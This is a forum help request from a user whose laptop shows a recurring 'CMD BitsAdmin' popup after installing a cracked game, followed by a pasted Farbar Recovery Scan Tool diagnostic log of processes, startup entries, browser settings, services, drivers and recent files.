Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CMD BitsAdmin


  • This topic is locked This topic is locked
14 replies to this topic

#1 oneiric

oneiric

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 04 January 2018 - 09:37 PM

Heeeey, so basically I tried downloading a cracked game a few days ago and it turns out to be a virus. Also whenever I start my laptop it pops up; it also pops up randomly.

 

2how0oa.jpg

 

mA86C2Z.jpg

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02.01.2018
Ran by ouroboros (administrator) on ENJAY (05-01-2018 10:21:40)
Running from C:\Users\ouroboros\Desktop
Loaded Profiles: ouroboros (Available Profiles: ouroboros & Visitor)
Platform: Windows 10 Home Single Language Version 1709 16299.125 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Garena Online ) C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\gxxsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.2.2.524\AsusWSWinService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(ASUS) C:\Program Files (x86)\ASUS\ASUS GIFTBOX Desktop\ASUSGiftBoxDesktop.exe
(ASUS) C:\Program Files (x86)\ASUS\ROG MacroKey\MacroSrv.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
() C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.17123-0\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.17123-0\NisSrv.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ROG Gaming Center\ROGGamingKey.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUS) C:\Program Files (x86)\ASUS\ROG MacroKey\AsListen.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel® Corporation) C:\Program Files (x86)\Intel\Intel® Extreme Tuning Utility\XtuService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [630168 2017-09-29] (Microsoft Corporation)
HKLM\...\Run: [SS2UILauncher] => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\SS2UILauncher.exe [970720 2015-08-15] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-17] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.2.2.524\ASUSWSLoader.exe [63272 2015-06-01] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-11-09] (Oracle Corporation)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CheckNDISPortF0ac46] => C:\Program Files (x86)\Hostless Modem\Sun Broadband\CheckNDISPort_df.exe [417176 2013-01-14] ()
HKLM-x32\...\Run: [CancelAutoPlay_df] => C:\Program Files (x86)\Hostless Modem\Sun Broadband\CancelAutoPlay_df.exe [440648 2012-11-20] ()
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22041192 2014-08-27] (Skype Technologies S.A.)
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Run: [Google Update] => C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\GoogleUpdateCore.exe [601680 2017-11-14] (Google Inc.)
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\Run: [Steam] => D:\Steam\steam.exe [3111712 2017-12-16] (Valve Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{13d2fa72-d1e4-4163-8069-bd2a738c08cc}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5c3cf4e3-0037-41c0-bf89-80c5028f3162}: [DhcpNameServer] 192.168.0.1 192.168.0.1
Tcpip\..\Interfaces\{5ff41fcb-f6c4-438d-a5eb-cc5c955c312a}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://asus15.msn.com/?pc=ASTE
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = 
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2017-12-19] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-12-19] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2017-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-12-22] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-05-01] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2017-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-12-22] (Oracle Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-12-19] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF DefaultProfile: iufruqdn.default
FF ProfilePath: C:\Users\ouroboros\AppData\Roaming\Mozilla\Firefox\Profiles\iufruqdn.default [2018-01-05]
FF Homepage: Mozilla\Firefox\Profiles\iufruqdn.default -> hxxp://mail.ru/cnt/10445?gp=811141
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_28_0_0_133.dll [2017-12-14] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-12-19] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.1.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2014-02-28] (VideoLAN)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_133.dll [2017-12-14] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-25] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-25] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-12-22] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-12-22] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-12-19] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2017-12-19] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-12-16] (NVIDIA Corporation)
FF Plugin-x32: @t.garena.com/garenatalk -> D:\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-15] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-11-01] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin HKU\S-1-5-21-1787623747-1286628437-3931833605-1001: @tools.google.com/Google Update;version=3 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin HKU\S-1-5-21-1787623747-1286628437-3931833605-1001: @tools.google.com/Google Update;version=9 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin HKU\S-1-5-21-1787623747-1286628437-3931833605-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\ouroboros\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-09] (Unity Technologies ApS)
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\ouroboros\AppData\Local\Google\Chrome\User Data\Default [2018-01-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ouroboros\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-01-05]
CHR Extension: (Chrome Media Router) - C:\Users\ouroboros\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-05]
CHR HKLM\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-05-25]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 AsHidService; C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe [111416 2015-06-27] (ASUSTek Computer Inc.)
R2 ASUS Rog Macro Key; C:\Program Files (x86)\ASUS\ROG MacroKey\MacroSrv.exe [492344 2015-07-03] (ASUS)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.2.2.524\AsusWSWinService.exe [71168 2015-06-01] (ASUS Cloud Corporation) [File not signed]
R2 ASUSGiftBoxDekstop; C:\Program Files (x86)\ASUS\ASUS GIFTBOX Desktop\ASUSGIFTBOXDesktop.exe [313488 2015-06-13] (ASUS) [File not signed]
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [6998536 2017-12-12] ()
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [7760552 2017-12-07] (Microsoft Corporation)
R2 esifsvc; C:\WINDOWS\SysWOW64\esif_uf.exe [1385640 2015-08-17] (Intel Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [373312 2015-04-15] (WildTangent)
R2 GarenaPlatform; C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\gxxsvc.exe [318272 2017-12-14] (Garena Online )
R2 ibtsiva; C:\WINDOWS\system32\ibtsiva.exe [190216 2016-10-15] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
S3 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-20] (Intel Corporation) [File not signed]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-20] () [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [207648 2015-09-19] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-11-29] ()
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519104 2017-12-16] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519104 2017-12-16] (NVIDIA Corporation)
S3 ROGGamingCenterService; C:\Program Files (x86)\ASUS\ROG Gaming Center\ROGGamingCenterService.exe [76032 2015-08-13] (ASUSTeK COMPUTER INC.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 ThunderboltService; C:\Program Files (x86)\Intel\Thunderbolt Software\tbtsvc.exe [1723048 2015-06-11] (Intel Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\NisSrv.exe [356176 2017-12-07] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MsMpEng.exe [105792 2017-12-07] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [654528 2015-05-27] (Wacom Technology, Corp.)
R2 XTU3SERVICE; C:\Program Files (x86)\Intel\Intel® Extreme Tuning Utility\XtuService.exe [19192 2015-08-13] (Intel® Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-11-29] (Intel® Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AsusSGDrv; C:\WINDOWS\system32\DRIVERS\AsusSGDrv.sys [138744 2015-08-18] (ASUS Corporation)
R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [53752 2015-08-17] (Intel Corporation)
R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [261624 2015-08-17] (Intel Corporation)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77432 2017-11-29] ()
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [250624 2016-10-15] (Intel Corporation)
R2 iocbios2; C:\Program Files (x86)\Intel\Intel® Extreme Tuning Utility\Drivers\IocDriver\64bit\iocbios2.sys [30224 2015-08-13] (Intel Corporation)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [193968 2018-01-05] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\DRIVERS\farflt.sys [110016 2018-01-05] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [46008 2018-01-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [253880 2018-01-05] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [94144 2018-01-05] (Malwarebytes)
R1 netfilter2; C:\WINDOWS\System32\drivers\netfilter2.sys [51904 2015-01-14] (Titan ARC Corp.)
R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7689728 2017-09-29] (Intel Corporation)
S3 nhi; C:\WINDOWS\System32\drivers\tbt81x.sys [122896 2015-06-29] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_40aceccb38b252dc\nvlddmkm.sys [17028552 2017-12-19] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-12-16] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [50624 2017-10-11] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-12-16] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [887552 2015-07-15] (Realtek )
R1 VBoxUSBMon; C:\WINDOWS\system32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46072 2017-12-07] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [288848 2017-12-07] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [129616 2017-12-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-05 10:21 - 2018-01-05 10:22 - 000024282 _____ C:\Users\ouroboros\Desktop\FRST.txt
2018-01-05 09:58 - 2018-01-05 09:58 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2018-01-05 09:52 - 2018-01-05 10:21 - 000000000 ____D C:\FRST
2018-01-05 09:51 - 2018-01-05 09:51 - 002393088 _____ (Farbar) C:\Users\ouroboros\Desktop\FRST64.exe
2018-01-05 09:38 - 2018-01-05 09:38 - 000193968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000253880 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000110016 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000094144 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2018-01-05 09:37 - 2018-01-05 09:58 - 000046008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2018-01-05 01:15 - 2018-01-05 10:03 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-01-03 19:57 - 2018-01-05 09:59 - 000000164 _____ C:\Users\ouroboros\AppData\Roaming\sp_data.sys
2018-01-03 15:12 - 2018-01-05 09:35 - 000000000 ____D C:\ProgramData\HitmanPro
2018-01-03 15:10 - 2018-01-03 15:12 - 011584088 _____ (SurfRight B.V.) C:\Users\ouroboros\Downloads\hitmanpro_x64.exe
2018-01-03 14:45 - 2018-01-05 09:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
